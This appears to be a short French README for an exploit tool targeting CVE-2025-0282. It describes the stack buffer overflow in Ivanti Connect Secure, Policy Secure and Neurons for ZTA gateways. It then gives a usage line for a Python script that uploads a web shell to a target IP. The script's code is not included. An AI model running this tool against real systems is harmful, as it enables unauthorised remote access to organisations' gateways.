
CVE-2025-0282
Un débordement de tampon basé sur la pile dans Ivanti Connect Secure avant la version 22.7R2.5, Ivanti Policy Secure avant la version 22.7R1.2 et Ivanti Neurons for ZTA gateways avant la version 22.7R2.3 permet à un attaquant distant non authentifié d'exécuter du code à distance.
CNA: ivanti Score de base : 9.0 CRITIQUE ⚫ Vecteur : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Pour utiliser l'outil afin de télécharger une web shell sur le système cible :
python3 CVE_2025_0282.py <target_ip> <local_shell_path>
<target_ip> : L'adresse IP du serveur cible.<local_shell_path> : Chemin vers le fichier de la web shell sur votre machine locale.